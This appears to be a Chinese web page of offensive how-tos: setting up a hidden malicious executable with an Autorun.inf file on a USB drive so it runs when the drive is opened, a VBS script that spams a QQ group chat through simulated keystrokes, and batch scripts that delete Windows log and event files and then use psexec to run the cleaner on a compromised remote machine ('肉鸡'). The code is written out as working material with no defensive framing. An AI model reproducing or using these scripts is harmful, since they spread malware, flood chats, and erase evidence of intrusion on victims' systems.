1、将可执行恶意文件放入U盘。并设置隐藏。
2、创建文件 Autorun.inf
3、写入内容:
[AutoRun] OPEN=恶意文件全名 shellexecute=恶意文件全名 shell\Atuo\command=恶意文件全名
隐藏本文件。
4、当U盘插入新的设备,操作人员双击U盘图标查看U盘时,会自动运行恶意文件。
VBS脚本,QQ群聊刷屏:
新建vbs后缀文件。内容如下:
Set WshShell= WScript.CreateObject("WScript.Shell")
WshShell.AppActivate "群聊刷屏测试"
for i=1 to 10
WScript.Sleep 500
WshShell.SendKeys "^v"
WshShell.SendKeys i
WshShell.SendKeys "%s"
Next
#for i=1to 10”语句用来控制发送次数,表示发送10次
打开一个群聊天窗口并复制要发送的内容到剪贴板上,双击刚才生成的“qq.vbs”切换到群聊天窗口中,在其中可看到已自动刷屏了。
日志清除:
新建del.bat脚本
@del c:winntsystem32logfiles*.*
@del c:winntsystem32config*.evt
@del c:winntsystem32dtclog*.*
@del c:winntsystem32*.log
@del c:winntsystem32*.txt
@del c:winnt*.txt
@del c:winnt*.log
@del c:del.bat
新建clean.bat
@copy del.bat
\%1c$
@echo
向肉鸡复制本机的del.bat
……OK
@psexec
\%1 c:del.bat
@echo
在肉鸡上运行del.bat
,清除日志文件……OK
亿速云「云服务器」,即开即用、新一代英特尔至强铂金CPU、三副本存储NVMe SSD云盘,价格低至29元/月。点击查看>>
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。